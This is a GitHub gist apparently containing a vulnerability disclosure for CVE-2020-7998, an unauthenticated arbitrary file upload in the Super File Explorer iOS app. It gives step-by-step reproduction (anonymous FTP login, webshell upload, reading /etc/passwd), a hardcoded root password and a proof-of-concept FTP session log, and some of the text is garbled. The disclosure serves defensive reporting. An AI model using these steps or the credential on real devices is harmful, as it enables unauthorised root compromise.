Created
January 28, 2020 02:31
-
-
Save adeshkolte/9e60b2483d2f20d1951beac0fc917c6f to your computer and use it in GitHub Desktop.
CVE-2020-7998 arbitrary file upload web vulnerability Super File Explorer app for iOS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
An arbitrary file upload web vulnerability has been discovered in the | |
> Super File Explorer app for iOS. | |
> The vulnerability is located in the developer path that is accessible | |
> and hidden next to the root path. | |
> By default, there is no password set for the FTP or Web UI service. | |
he arbitrary file | |
> upload web vulnerability can be exploited by remote attackers without | |
> privilege application user account or user interaction. For security | |
> demonstration or to reproduce the vulnerability follow the provided | |
> information and steps below to continue. | |
> | |
> Manual steps to reproduce the vulnerability ... 1. Install the | |
> vulnerable mobile ios application to your test iDevice (iphone) 2. | |
> Start the mobile device software 3. Start the ftp and web-server via | |
> remote manager button push 4. Open the ftp via console and login as | |
> random user with any credentials 5. Move to the developer path in the | |
> upper folder 6. Upload of a remote system or the local system path via | |
> network a webshell 7. Open ftp web ui url (http://localhost) and move | |
> to the developer path 8. Open the webshell and request via GET the | |
> "/etc/passwd" file that is accessible 9. Login again to the ftp server | |
> using the root:smx7MYTQIi2M 10. Successful root access to compromise | |
> the ftp server and mobile via arbitrary file upload vulnerability! | |
> | |
> FTP WEB UI URL: http://localhost | |
> | |
> FTP SERVER URL: localhost:2121 | |
> | |
> --- PoC Exploitation --- C:UsersAdmin>ftp ftp> open 192.168.2.241 2121 | |
> Verbindung mit 192.168.2.241 wurde hergestellt. 220 iosFtp server | |
> ready. 502 Unknown command 'UTF8' Benutzer (192.168.2.241:(none)): | |
> anonymous 331 Password required for anonymous Kennwort: a@b.com 230 | |
> User anonymous logged in. ftp> cd .. 250 CWD command successful. ftp> | |
> dir 200 PORT command successful. 150 Opening ASCII mode data connection | |
> for '/bin/ls'. total 3 drwxr-xr-x 1 mobile mobile 68 Feb 17 22:02 | |
> Documents drwxr-xr-x 3 mobile mobile 170 Feb 17 22:05 Library | |
> drwxr-xr-x 1 mobile mobile 68 Feb 17 22:02 tmp 226 Transfer complete. | |
> FTP: 199 Bytes empfangen in 0.01Sekunden 13.27KB/s ftp> cd /../ 250 CWD | |
> command successful. ftp> dir 200 PORT command successful. 150 Opening | |
> ASCII mode data connection for '/bin/ls'. total 13 ---------- 1 (null) | |
> (null) 0 (null) Applications drwxrwxr-x 1 root admin 68 May 29 23:45 | |
> Developer ---------- 1 (null) (null) 0 (null) Library ---------- 1 | |
> (null) (null) 0 (null) System ---------- 1 (null) (null) 0 (null) bin | |
> ---------- 1 (null) (null) 0 (null) cores ---------- 1 (null) (null) 0 | |
> (null) dev ---------- 1 (null) (null) 0 (null) etc --------- | |
> | |
> ------------------------------------------ | |
> | |
> [VulnerabilityType Other] | |
> Arbitrary File Upload Vulnerability | |
> | |
> ------------------------------------------ | |
> | |
> [Vendor of Product] | |
> Super File Explorer 1.0. | |
> | |
> ------------------------------------------ | |
> | |
> [Affected Product Code Base] | |
> Super File Explorer 1.0. - le Explorer 1.0. | |
> | |
> ------------------------------------------ | |
> | |
> [Affected Component] | |
> LZX Apps | |
> Product: Super File Explorer - File Viewer & File Manager (Wifi UI & FTP) 1.0.1 | |
> | |
> ------------------------------------------ | |
> | |
> [Attack Type] | |
> Remote | |
> | |
> ------------------------------------------ | |
> | |
> [Has vendor confirmed or acknowledged the vulnerability?] | |
> true | |
> | |
> ------------------------------------------ | |
> | |
> [Discoverer] | |
> Adesh Nandkishor Kolte | |
> | |
> ------------------------------------------ | |
> | |
> [Reference] | |
> https://apps.apple.com/us/app/super-file-explorer-file-viewer-file-manager/id1101973946 | |
Use CVE-2020-7998. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment